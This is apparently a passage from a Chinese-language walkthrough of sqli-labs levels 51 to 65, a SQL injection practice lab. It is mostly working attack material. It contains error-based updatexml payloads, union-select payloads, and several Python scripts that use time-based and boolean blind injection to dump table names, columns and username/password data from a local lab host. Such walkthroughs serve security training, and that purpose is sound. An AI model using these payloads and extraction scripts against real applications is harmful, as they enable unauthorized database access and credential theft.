时间盲注,堆叠注入,报错注入都行,和前面的差不多了
?sort=0' and updatexml(1,concat(1,(select database())),1)--+ ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-52
- 时间盲注,堆叠注入。
import requests
url = 'http://192.168.3.39:84/Less-52/?sort=0||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-53
- 时间盲注,堆叠注入。
import requests
url = 'http://192.168.3.39:84/Less-53/?sort=0\'||'
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
#payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
try:
r = requests.get(url + payload, timeout=1)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
result += chr(head)
else:
break
print(result)
less-54
-
和前面的类似,但是有次数限制,首先应该测闭合方式,最常见的就是引号闭合。然后这题开始数据库、表、字段、内容都可能不一样,一步步尝试获取。
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='GAC1FTFF3I'--+ 查看字段 ?id=0' union select 1,2,group_concat(sessid,0x3e,secret_SBM0,0x3e,tryy) from GAC1FTFF3I--+ 查看内容。
less-55
-
同less-54。
?id=0) union select 1,2,database()--+ 查看数据库 ?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+ 查看字段 ?id=0) union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+ 查看内容。
less-56
-
同less-54。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+ 查看字段 ?id=0') union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+ 查看内容。
less-57
-
同less-54。
?id=0" union select 1,2,database()--+ 查看数据库 ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BJGSBTXAB5'--+ 查看字段 ?id=0" union select 1,2,group_concat(sessid,0x3e,secret_5M6O,0x3e,tryy) from BJGSBTXAB5--+ 查看内容。
less-58
-
报错注入,和上面差不多,但次数限制5,试闭合可能就没了。所以可以直接从表开始查起,不查数据库,因为可以不需要。
?id=0'||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='MGJP2WHM3Y')),2)--+ 查看字段 ?id=0'||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_24RK,0x3e,tryy) from MGJP2WHM3Y),1,32)),2)--+ 查看内容。
less-59
-
同less-58。
?id=0||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='LT7KPWCFHN')),2)--+ 查看字段 ?id=0||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_ARJK,0x3e,tryy) from LT7KPWCFHN),1,32)),2)--+ 查看内容。
less-60
-
同less-58。
?id=0")||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0")||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0")||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+ 查看字段 ?id=0")||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_YEKB,0x3e,tryy) from VFQELTLHRF),1,32)),2)--+ 查看内容。
less-61
-
同less-58。
?id=0'))||updatexml(1,concat(1,database()),2)--+ 查看数据库 ?id=0'))||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 ?id=0'))||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+ 查看字段 ?id=0'))||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_90EI,0x3e,tryy) from H3TPPX9L6M),1,32)),2)--+ 查看内容。
less-62
- 盲注,当然能布尔就布尔。
import requests
url = "http://192.168.3.39:84/Less-62/?id=0')||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="BVOP9BQ5Y1")),%d,1))>%d,1,0)--+'%(i,mid)
payload = 'if(ascii(substr((select(group_concat(secret_1BQG))from(BVOP9BQ5Y1)),%d,1))>%d,1,0)--+'%(i,mid)
r = requests.get(url + payload)
if "Angelina" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-63
- 同less-62,先点右上角的Reset the callengle!。因为有次数限制,先重置一下
import requests
url = "http://192.168.3.39:84/Less-63/?id=0'||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="1TR0A8MPVK")),%d,1))>%d,1,0)--+'%(i,mid)
payload = 'if(ascii(substr((select(group_concat(secret_A7M1))from(1TR0A8MPVK)),%d,1))>%d,1,0)--+'%(i,mid)
r = requests.get(url + payload)
if "Angelina" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-64
- 同less-63。
import requests
url = "http://192.168.3.39:84/Less-64/?id=0))||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="R4BFEIU6PA")),%d,1))>%d,1,0)--+'%(i,mid)
payload = 'if(ascii(substr((select(group_concat(secret_QVX3))from(R4BFEIU6PA)),%d,1))>%d,1,0)--+'%(i,mid)
r = requests.get(url + payload)
if "Angelina" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
less-65
- 同less-63。
import requests
url = "http://192.168.3.39:84/Less-65/?id=0\")||"
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
#payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
#payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="2WU00QD714")),%d,1))>%d,1,0)--+'%(i,mid)
payload = 'if(ascii(substr((select(group_concat(secret_3IE7))from(2WU00QD714)),%d,1))>%d,1,0)--+'%(i,mid)
r = requests.get(url + payload)
if "Angelina" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
三、结束
- 注入方法就那几种,在比赛时,一是找注入点,而是绕过过滤处理。